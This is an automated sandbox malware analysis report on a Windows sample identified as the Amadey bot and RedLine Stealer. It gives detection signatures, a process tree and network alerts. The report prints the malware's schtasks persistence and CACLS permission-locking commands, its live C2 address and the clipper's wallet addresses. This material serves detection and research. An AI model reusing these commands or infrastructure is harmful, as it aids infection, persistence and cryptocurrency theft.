Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:802001
MD5:392470d5b5723c386b943751c15721a6
SHA1:83491316d575cc2a867224532fe25e016d8c3f43
SHA256:fd0d72d174c13185267e7e38ac8faf1e5b646e5852645e83dcc12a028214a707
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5152 cmdline: C:\Users\user\Desktop\file.exe MD5: 392470D5B5723C386B943751C15721A6)
    • bmMg.exe (PID: 5132 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe MD5: 03D901B08C7DE9A3C6323A8C6DF73569)
      • amMl.exe (PID: 2508 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe MD5: AD3805672C5FE617D88DCE7E50E56B9F)
      • nika.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 588 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 4184 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 5256 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6092 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 64 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 760 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 2056 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 4124 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 4900 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 3924 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 3420 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 1536 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 664 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4556 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 1116 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 3232 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4928 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            00000010.00000000.402656135.0000000000831000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0000001F.00000002.519184660.0000000000831000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0000001F.00000000.518847759.0000000000831000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    00000023.00000002.646081844.0000000000831000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 19 entries
                      SourceRuleDescriptionAuthorStrings
                      2.2.amMl.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        2.2.amMl.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                        • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                        • 0x1e9d0:$s5: delete[]
                        • 0x1de88:$s6: constructor or from DllMain.
                        2.2.amMl.exe.5b0e67.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          2.2.amMl.exe.5b0e67.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                          • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                          • 0x1e9d0:$s5: delete[]
                          • 0x1de88:$s6: constructor or from DllMain.
                          31.2.mnolyk.exe.830000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            Click to see the 18 entries
                            No Sigma rule has matched
                            Timestamp:192.168.2.362.204.41.449933802027700 02/08/23-21:32:21.545353
                            SID:2027700
                            Source Port:49933
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449740802027700 02/08/23-21:31:26.105437
                            SID:2027700
                            Source Port:49740
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449835802027700 02/08/23-21:31:52.859571
                            SID:2027700
                            Source Port:49835
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449737802027700 02/08/23-21:31:25.346205
                            SID:2027700
                            Source Port:49737
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449798802027700 02/08/23-21:31:43.430750
                            SID:2027700
                            Source Port:49798
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449896802027700 02/08/23-21:32:09.795235
                            SID:2027700
                            Source Port:49896
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449948802027700 02/08/23-21:32:25.249770
                            SID:2027700
                            Source Port:49948
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449755802027700 02/08/23-21:31:29.861684
                            SID:2027700
                            Source Port:49755
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449820802027700 02/08/23-21:31:48.811905
                            SID:2027700
                            Source Port:49820
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449709802027700 02/08/23-21:31:11.416191
                            SID:2027700
                            Source Port:49709
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449807802027700 02/08/23-21:31:45.583489
                            SID:2027700
                            Source Port:49807
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449783802027700 02/08/23-21:31:39.747318
                            SID:2027700
                            Source Port:49783
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449868802027700 02/08/23-21:32:03.033763
                            SID:2027700
                            Source Port:49868
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449881802027700 02/08/23-21:32:06.188564
                            SID:2027700
                            Source Port:49881
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449863802027700 02/08/23-21:32:01.828272
                            SID:2027700
                            Source Port:49863
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449712802027700 02/08/23-21:31:12.121654
                            SID:2027700
                            Source Port:49712
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449810802027700 02/08/23-21:31:46.341949
                            SID:2027700
                            Source Port:49810
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449905802027700 02/08/23-21:32:12.384320
                            SID:2027700
                            Source Port:49905
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449961802027700 02/08/23-21:32:28.958110
                            SID:2027700
                            Source Port:49961
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449966802027700 02/08/23-21:32:30.274782
                            SID:2027700
                            Source Port:49966
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449765802027700 02/08/23-21:31:32.555336
                            SID:2027700
                            Source Port:49765
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449788802027700 02/08/23-21:31:40.954036
                            SID:2027700
                            Source Port:49788
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449727802027700 02/08/23-21:31:22.887483
                            SID:2027700
                            Source Port:49727
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449923802027700 02/08/23-21:32:19.023556
                            SID:2027700
                            Source Port:49923
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449958802027700 02/08/23-21:32:28.145173
                            SID:2027700
                            Source Port:49958
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449704802027700 02/08/23-21:31:10.105007
                            SID:2027700
                            Source Port:49704
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449830802027700 02/08/23-21:31:51.265355
                            SID:2027700
                            Source Port:49830
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449900802027700 02/08/23-21:32:10.776959
                            SID:2027700
                            Source Port:49900
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449745802027700 02/08/23-21:31:27.438465
                            SID:2027700
                            Source Port:49745
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449871802027700 02/08/23-21:32:03.779795
                            SID:2027700
                            Source Port:49871
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449817802027700 02/08/23-21:31:48.055582
                            SID:2027700
                            Source Port:49817
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449722802027700 02/08/23-21:31:17.801755
                            SID:2027700
                            Source Port:49722
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449793802027700 02/08/23-21:31:42.202189
                            SID:2027700
                            Source Port:49793
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449853802027700 02/08/23-21:31:59.419398
                            SID:2027700
                            Source Port:49853
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449775802027700 02/08/23-21:31:37.801160
                            SID:2027700
                            Source Port:49775
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449800802027700 02/08/23-21:31:43.904291
                            SID:2027700
                            Source Port:49800
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449858802027700 02/08/23-21:32:00.606919
                            SID:2027700
                            Source Port:49858
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449778802027700 02/08/23-21:31:38.510712
                            SID:2027700
                            Source Port:49778
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449809802027700 02/08/23-21:31:46.106372
                            SID:2027700
                            Source Port:49809
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449907802027700 02/08/23-21:32:13.917744
                            SID:2027700
                            Source Port:49907
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449876802027700 02/08/23-21:32:04.982215
                            SID:2027700
                            Source Port:49876
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449910802027700 02/08/23-21:32:15.871067
                            SID:2027700
                            Source Port:49910
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449760802027700 02/08/23-21:31:31.042505
                            SID:2027700
                            Source Port:49760
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449815802027700 02/08/23-21:31:47.530708
                            SID:2027700
                            Source Port:49815
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449913802027700 02/08/23-21:32:16.595552
                            SID:2027700
                            Source Port:49913
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449735802027700 02/08/23-21:31:24.825436
                            SID:2027700
                            Source Port:49735
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449928802027700 02/08/23-21:32:20.315211
                            SID:2027700
                            Source Port:49928
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449729802027700 02/08/23-21:31:23.382592
                            SID:2027700
                            Source Port:49729
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449840802027700 02/08/23-21:31:56.252732
                            SID:2027700
                            Source Port:49840
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449943802027700 02/08/23-21:32:24.007317
                            SID:2027700
                            Source Port:49943
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449845802027700 02/08/23-21:31:57.496565
                            SID:2027700
                            Source Port:49845
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449730802027700 02/08/23-21:31:23.623024
                            SID:2027700
                            Source Port:49730
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449886802027700 02/08/23-21:32:07.408944
                            SID:2027700
                            Source Port:49886
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449851802027700 02/08/23-21:31:58.949710
                            SID:2027700
                            Source Port:49851
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449724802027700 02/08/23-21:31:22.157497
                            SID:2027700
                            Source Port:49724
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449848802027700 02/08/23-21:31:58.209736
                            SID:2027700
                            Source Port:49848
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449802802027700 02/08/23-21:31:44.378402
                            SID:2027700
                            Source Port:49802
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449707802027700 02/08/23-21:31:10.935837
                            SID:2027700
                            Source Port:49707
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449837802027700 02/08/23-21:31:54.069031
                            SID:2027700
                            Source Port:49837
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449773802027700 02/08/23-21:31:37.289230
                            SID:2027700
                            Source Port:49773
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449843802027700 02/08/23-21:31:57.016438
                            SID:2027700
                            Source Port:49843
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449732802027700 02/08/23-21:31:24.105231
                            SID:2027700
                            Source Port:49732
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449878802027700 02/08/23-21:32:05.452117
                            SID:2027700
                            Source Port:49878
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449951802027700 02/08/23-21:32:26.219930
                            SID:2027700
                            Source Port:49951
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449921802027700 02/08/23-21:32:18.515786
                            SID:2027700
                            Source Port:49921
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449873802027700 02/08/23-21:32:04.268049
                            SID:2027700
                            Source Port:49873
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449915802027700 02/08/23-21:32:17.076591
                            SID:2027700
                            Source Port:49915
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449956802027700 02/08/23-21:32:27.633042
                            SID:2027700
                            Source Port:49956
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449795802027700 02/08/23-21:31:42.683944
                            SID:2027700
                            Source Port:49795
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449893802027700 02/08/23-21:32:09.064082
                            SID:2027700
                            Source Port:49893
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449884802027700 02/08/23-21:32:06.923410
                            SID:2027700
                            Source Port:49884
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449954802027700 02/08/23-21:32:27.113819
                            SID:2027700
                            Source Port:49954
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449706802027700 02/08/23-21:31:10.701281
                            SID:2027700
                            Source Port:49706
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449865802027700 02/08/23-21:32:02.300345
                            SID:2027700
                            Source Port:49865
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449715802027700 02/08/23-21:31:13.538251
                            SID:2027700
                            Source Port:49715
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449762802027700 02/08/23-21:31:31.524264
                            SID:2027700
                            Source Port:49762
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449804802027700 02/08/23-21:31:44.855991
                            SID:2027700
                            Source Port:49804
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449969802027700 02/08/23-21:32:31.022857
                            SID:2027700
                            Source Port:49969
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449883802027700 02/08/23-21:32:06.680163
                            SID:2027700
                            Source Port:49883
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449753802027700 02/08/23-21:31:29.389092
                            SID:2027700
                            Source Port:49753
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449842802027700 02/08/23-21:31:56.777809
                            SID:2027700
                            Source Port:49842
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449776802027700 02/08/23-21:31:38.042042
                            SID:2027700
                            Source Port:49776
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449805802027700 02/08/23-21:31:45.092452
                            SID:2027700
                            Source Port:49805
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449935802027700 02/08/23-21:32:22.032745
                            SID:2027700
                            Source Port:49935
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449846802027700 02/08/23-21:31:57.735834
                            SID:2027700
                            Source Port:49846
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449757802027700 02/08/23-21:31:30.341809
                            SID:2027700
                            Source Port:49757
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449912802027700 02/08/23-21:32:16.359167
                            SID:2027700
                            Source Port:49912
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449716802027700 02/08/23-21:31:14.532463
                            SID:2027700
                            Source Port:49716
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449781802027700 02/08/23-21:31:39.216997
                            SID:2027700
                            Source Port:49781
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449953802027700 02/08/23-21:32:26.867865
                            SID:2027700
                            Source Port:49953
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449823802027700 02/08/23-21:31:49.543782
                            SID:2027700
                            Source Port:49823
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449734802027700 02/08/23-21:31:24.588963
                            SID:2027700
                            Source Port:49734
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449899802027700 02/08/23-21:32:10.520938
                            SID:2027700
                            Source Port:49899
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449861802027700 02/08/23-21:32:01.357771
                            SID:2027700
                            Source Port:49861
